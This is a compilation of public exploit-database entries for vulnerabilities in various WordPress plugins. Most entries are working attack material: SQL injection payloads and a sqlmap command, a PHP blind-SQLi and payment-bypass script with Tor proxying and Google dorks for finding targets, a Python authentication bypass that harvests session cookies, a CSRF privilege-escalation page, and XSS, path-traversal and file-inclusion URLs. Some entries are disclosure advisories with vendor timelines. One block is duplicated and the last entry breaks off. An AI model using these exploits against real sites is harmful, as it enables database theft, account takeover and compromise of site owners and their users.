I found the SQLi, now we need to found a place where ` UPCP_Filter_Catalogue` is called and in line 138-139 i found...

...
add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue');
add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue');
...

this means that we can execute that function only with a request to `/wp-admin/admin-ajax.php?action=update_catalogue` and send the vulnerable $id parameter
with our custom payload. Note that `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users.

Example:

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue

POSTDATA: id=0+or+(our+custom+select+here)+--


An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine.

==============
 POC
==============
-----------------
//REQUEST
------------------

POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1
Host: localhost
Content-Length: 21
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.8
Cookie: 

id=1+OR+SLEEP(10)+--+

--------------------------
 EXPLOITING WITH SQLMAP
------------------------

sqlmap --url="http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B  -p id --dbs --dbms=mysql

(listing all available databases)


==================================
time-line
===================================

2016-07-28: reported to vendor.
2016-07-28: vendor released plugin version 3.9.9. saying in changelog "Minor ajax update to switch to a prepared statement".
2016-07-29: public disclousure.
===================================
HireHackking 
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox. 
# Demo: https://youtu.be/FSRZlD3SVQc

====================
 DESCRIPTION
====================

An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote 
attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.

===================
 STEPS TO REPRODUCE
===================

1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.

================
 Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check for file extensions.

function UPCP_Handle_File_Upload($Field_Name) {
	..		
	if (!is_user_logged_in()) {exit();}
		/* Make sure that the file exists */ 	 	
		elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
			$error = __('No file was uploaded here..', 'UPCP');
		}
		/* Move the file and store the URL to pass it onwards*/ 	 	
		else {				 
		 	  $msg .= $_FILES[$Field_Name]['name'];
			//for security reason, we force to remove all uploaded file
			$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
			//create the uploads directory if it doesn't exist
			if (!file_exists($target_path)) {
				  mkdir($target_path, 0777, true);
			}
			$target_path = $target_path . basename( $_FILES[$Field_Name]['name']); 
			if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
				//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
	 			  $error .= "There was an error uploading the file, please try again!";
			}
	...
}

?>

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


==========
time-line
==========

2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclousure
===================================
HireHackking 
<!--
# Exploit Title: Wordpress Ultimate-Product-Catalog <=3.8.1 Privilege escalation
# Date: 2016-06-17
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.etoilewebdesign.com
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Software Link: 
# Version: 3.8.1
# Tested on: windows 7 + Mozilla firefox. 
# Demo: https://www.youtube.com/watch?v=m_qMZ2wIQPI

====================
 DESCRIPTION
====================

In a recent security research, a privilege scalation web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin <=v3.8.1.
The vulnerability allows remote attackers to take over control of the Ultimate Product Catalogue Plugin administration page if the plugin ispremium version and the remote attacker have an especific account (contributor|editor|author).
The privilege scalation web vulnerability is located in the <upc-plugin-path>/Functions/Update_Admin-Databases.php` file.
Remote attackers are able to request crafted data of the POST method request with the vulnerable ´acces_role´ parameter.

The security risk of the privilege scalation web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the privilege scalation vulnerability requires low user interaction and low privilege web-application user account.
Successful exploitation of the privilege scalation web vulnerability results in web aplication compromise.

For security demostration I made a prof of concept to show the vulnerability logged in as a contributor user.

==============
 POC (html)
==============
-->

<html>

  <body>
    <script>
      function submitRequest()
      {
      	var access_role = "contributor"; //this is my type of profile (contributor|editor|author) to full admin acces!!
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/wordpress/wp-admin/admin-ajax.php?action=UPCP-options&Action=UPCP_UpdateOptions", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.setRequestHeader("Accept-Language", "es-ES,es;q=0.8");
        xhr.withCredentials = true;
        var body = "color_scheme=Blue&product_links=Same&read_more=Yes&desc_count=240&sidebar_order=Normal&Details_Image=http%3A%2F%2F&filter_type=AJAX&case_insensitive_search=Yes&tag_logic=AND&product_search=name&contents_filter=Yes&maintain_filtering=Yes&Socialmedia%5B%5D=Blank&custom_product_page=No&product_inquiry_form=No&product_reviews=No&lightbox=No&products_per_page=1000000&pagination_location=Top&product_sort=Price_Name&cf_converion=No&access_role="+access_role
        +"&pretty_links=No&xml_sitemap_url=&seo_option=None&seo_integration=Add&seo_title=%5Bpage-title%5D+%7C+%5Bproduct-name%5D&categories_label=&subcategories_label=&tags_label=&custom_fields_label=&sort_by_label=&price_ascending_label=&price_descending_label=&name_ascending_label=&name_descending_label=&product_name_search_label=&product_name_text_label=&details_label=&back_to_catalogue=&no_results_found_label=&products_pagination_label=&product_details_label=&additional_info_label=&contact_us_label=&related_products_label=&next_product_label=&previous_product_label=&Options_Submit=Save+Changes";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="I want more privileges!!" onclick="submitRequest();" />
    </form>
  </body>
</html>

<!--
================
 Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file


function Update_UPCP_Options() {
	global $Full_Version;
	$InstallVersion = get_option("UPCP_First_Install_Version");
	...

	if ($Full_Version == "Yes" and isset($_POST['access_role'])) {update_option("UPCP_Access_Role", $_POST['access_role']);}
	...
	
	$update = __("Options have been succesfully updated.", 'UPCP');
	return $update;
}

the function no check for capabilities...

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q

============
 REFERENCES
============
	https://i0akinsec.wordpress.com/2016/06/17/wordpress-ultimate-product-catalog-3-8-1-privilege-escalation/
	http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
	https://wordpress.org/plugins/ultimate-product-catalogue/
	https://wordpress.org/plugins/ultimate-product-catalogue/changelog/
	

Note: The vulnerability can be exploited if the plugin is in full version.
      An attacker without any account, but the administration menu item only appear when the attacker
      account is contributor, editor or author. When the legitimate UPCP administrator want request the plugin administration page, it will
      denegate his access.

==================================

time-line

2015-10-08: vulnerability found
2016-06-17: reported to vendor
2016-06-17: Vendor has realeased a new version (3.8.)
2016-06-18: Public disclousure
===================================
-->
HireHackking 
<?php
/**
 * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
 * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ...  inurl:"lid=100" "Register" "Confirm Password"
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://wpindeed.com/
 * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
 * Version: 3.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
 * Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}

function isTrue($sql){
    global $curl, $options;
    $levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
    $data = array(
        'action'=>'ihc_preview_user_listing',
        'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
    );
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}

function exploit(){
    global $curl, $options;

    if ($options['m'] == 'pay'){
        $level = $options['l'];
        for($i=$options['s']; $i<$options['e']; $i++){
            //This is mental, no IP or Hash check!
            echo "Paying Level $level to UserID: $i\n";
            $data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
            $curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
            //echo $curl->getResponse();
        }
    }
    if ($options['m'] == 'sql'){
        $query = $options['s'];
        echo "'Running' SQL Query: $query\n";
        echo "Getting Length";
        $max_length = 100;
        //Well, it is messed up, can use , (comma) in the query
        //Binary search or divide et impera is possible with the BETWEEN operator
        //Code it yourself :)
        $len = 0;
        for ($i=1;$i<$max_length;$i++){
            $sql_len = "(select char_length( ($query) ) = $i )";
            if (isTrue($sql_len)){
                echo "\nLength found: $i\n";
                $len = $i;
                break;
            } else {
                echo ".";
            }
        }
        if ($len !== 0 ){
            echo "Reading char by char\nResponse:\n";
        } else {
            die("Failed getting length!\nAboring.\n\n");
        }
        $charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
        for ($i=1;$i<$len;$i++){
            $got = false;
            for ($j=0;$j<strlen($charset);$j++){
                $chr = $charset[$j];
                $question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
                if (isTrue($question)){
                    echo $charset[$j];
                    $got = true;
                    break;
                }
            }
            if (!$got){
                echo "?";
            }
        }
        echo "\n\n";

    }
}

exploit();

function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }

    if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
        return false;
    }
    if ($options['m'] == 'sql' && !isset($options['s'])) {
        return false;
    }

    if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
        return false;
    }
    if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
        echo "In pay mode -s -e and -l must be numeric!\n";
        return false;
    }

    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

     Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit


Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]

       [MODE] sql  - Blind SQL Inject mode*
              pay  - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID

       *Note: You can't use , (comma) in the query.

Examples:
       php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
       php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1

       Marks all users with UserID between 0 and 1000 as paying customer for level ID 1

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}
HireHackking 
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking 
# Title: WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress Ultimate Form Builder Lite plugin
# Version: 1.3.7 and below

# The easiest way to reproduce the SQL injection vulnerability is to
# visit the provided URL while being logged in as administrator or
# another user that is authorized to access the plugin settings page.
# Users that do not have full administrative privileges could abuse the
# database access the vulnerability provides to either escalate their
# privileges or obtain and modify database contents they were not
# supposed to be able to.

# SQL injection
# Vulnerable Function:  $wpdb->get_row()
# Vulnerable Variable:  $_POST['entry_id']
# Vulnerable URL:       http://vulnerablesite.com/wp-admin/admin-ajax.php
# Vulnerable POST body:

entry_id=ExploitCodeHere&_wpnonce=xxx&action=ufbl_get_entry_detail_action

# Disclosure Timeline
# 2018/06/01   Vulnerabilities discovered
# 2018/06/06   Vendor contacted
# 2018/06/08   Vendor responded
# 2018/06/12   Advisory released to the public
HireHackking 
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''

Requirements:
    * Valid Admin/User Email Needs to be Known
    * Social Media Login Form has to be Embedded in the Specified URL

'''

#!/usr/bin/python3

import requests
import urllib.parse
import json
import argparse

banner = r''' ____ ___  _____ _______________________________              .__         .__  __   
|    |   \/  _  \\______   \______   \_   _____/__  _________ |  |   ____ |__|/  |_ 
|    |   /  /_\  \|    |  _/|    |  _/|    __)_\  \/  /\____ \|  |  /  _ \|  \   __\
|    |  /    |    \    |   \|    |   \|        \>    < |  |_> >  |_(  <_> )  ||  |  
|______/\____|__  /______  /|______  /_______  /__/\_ \|   __/|____/\____/|__||__|  
                \/       \/        \/        \/      \/|__|                         
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''

class exploit(object):
    def __init__(self, page, email):
        self.page = page
        self.sess = requests.Session()
        self.email = email
        self.nonce = False

    def get_nonce(self):
        try:
            nonce_req = self.sess.get(self.page)
            if nonce_req.text.find("data-nonce=") != -1:
                self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
        except Exception as e:
            print("Nonce Error: {}".format(e))

    def auth_bypass(self):
        try:
            schema = urllib.parse.urlparse(self.page)
            resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
                    "action" : "uabb-lf-google-submit",
                    "name" : "raphaelrocks",
                    "email" : self.email,
                    "nonce" : self.nonce
            })
            if resp.status_code == 200:
                print("Exploit Successful, Use the Cookies to Login: \n{}".format(
                    json.dumps(self.sess.cookies.get_dict(), indent=4)
                ))
        except Exception as e:
            print("Auth Bypass Error: {}".format(e))

    def begin_exploit(self):
        self.get_nonce()
        if self.nonce:
            print("Found Nonce: {}".format(self.nonce))
            self.auth_bypass()
        else:
            print("Failed to Gather Nonce")

if __name__ == "__main__":
    print(banner)
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
    parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
    args = parser.parse_args()
    ex = exploit(args.url, args.email)
    ex.begin_exploit()
HireHackking 
# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea

How to reproduce vulnerability:

1. Install Latest WordPress

2. Install and activate Typebot Version 1.4.3

3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.

4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(1)>

5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
HireHackking 
#  Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id; 
447: $topic_id = sanitize_text_field($_POST['topic_id']); 
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================
HireHackking 
#  Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
7: include include $include_file; 
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
7: include include $include_file; 
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
HireHackking 
# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses. 
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors. 
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings 
# page, the attacker will be able to create courses directly as well. All WordPress websites 
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF 
# attack to approve an attacker-controlled instructor account can be performed by having the admin 
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, 
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked 
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor 
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. 
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is 
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can 
# be tricked into visiting the link and triggering the request to add an instructor.

<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="add&#95;new&#95;instructor" />
			<input type="hidden" name="first&#95;name" value="John" />
			<input type="hidden" name="last&#95;name" value="Doe" />
			<input type="hidden" name="user&#95;login" value="jd_instructor" />
			<input type="hidden" name="email" value="jd@TARGET" />
			<input type="hidden" name="phone&#95;number" value="1231231231" />
			<input type="hidden" name="password" value="Pa&#36;&#36;w0rd&#33;" /> 
			<input type="hidden" name="password&#95;confirmation" value="Pa&#36;&#36;w0rd&#33;" />
			<input type="hidden" name="tutor&#95;profile&#95;bio" value="Et&#32;tempore&#32;culpa&#32;n" />
			<input type="hidden" name="action" value="tutor&#95;add&#95;instructor" /> 
			<input type="submit" value="Submit request" />
		</form> 
	</body>
</html>

3. Timeline

Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
HireHackking 
=======================================================================
              title: SQL Injection
            product: WordPress Tune Library Plugin
 vulnerable version: 1.5.4 (and probably below)
      fixed version: 1.5.5
         CVE number: CVE-2015-3314
             impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
           homepage: https://wordpress.org/plugins/tune-library/
              found: 2015-01-09
                 by: Hannes Trunde
                     
               mail: hannes.trunde@gmail.com
            twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"This plugin is used to import an XML iTunes Music Library file into your 
WordPress database. Once imported, you can display a complete listing of your 
music collection on a page of your WordPress site."

Source: https://wordpress.org/plugins/tune-library/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed 
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a sql injection attack can be
performed when sorting artists by letter.

However, special conditions must be met in order to exploit this vulnerability:
1) The wordpress security feature wp_magic_quotes(), which is enabled by 
   default, has to be disabled.
2) The plugin specific option "Filter artists by letter and show alphabetical
   navigation" has to be enabled.

   
Proof of concept:
-----------------
The following HTTP request to the Tune Library page returns version, current 
user and db name:
===============================================================================
http://www.site.com/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
===============================================================================


Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-09: Author replies and announces a fix within a week.
2015-04-12: Mail from author, stating that plugin has been updated.
2015-04-14: Requesting CVE via post to the open source software security mailing 
            list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-20: Release of security advisory.


Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by
letter..." option.
HireHackking 
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
 Multiple Security Vulnerabilities


Advisory ID:            DC-2017-01-012
Advisory Title:         WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL:           http://www.defensecode.com/advisories.php
Software:               WordPress Tribulant Newsletters Plugin
Language:               PHP
Version:                4.6.4.2 and below
Vendor Status:          Vendor contacted, update released
Release Date:           2017/05/29
Risk:                   Medium



1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.

More information about WebScanner is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.

According to wordpress.org, it has more than 9,000 active installs.

Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin


3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.

3.1 File Disclosure
----
Input:          $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini

3.2 Cross-Site Scripting
----
Input:          $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.3 Cross-Site Scripting
----
Input:          $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start 

3.4 Cross-Site Scripting
----
Input:          $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.5 Cross-Site Scripting
----
Input:          $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>

3.6 Cross-Site Scripting
----
Input:          $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

3.7 Cross-Site Scripting
----
Input:          $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.8 Cross-Site Scripting
----
Input:          $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/04/04      Vendor contacted
2017/04/06      Vendor responded, update released
2017/05/29      Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
HireHackking 
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/ 
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6 
# Tested on: macOS 11.4
# CVE : CVE-2021-24610

Description:
The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "<script></script>" with the preg_replace, the attacker can use the HTML Tag to execute javascript.

Step To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Input Gettext String
3. Input the payload such as <img src=x onerror=alert(4)>
4. Save, The payload will be executed.
5. Look on the homepage will be affected.

Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
HireHackking 
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
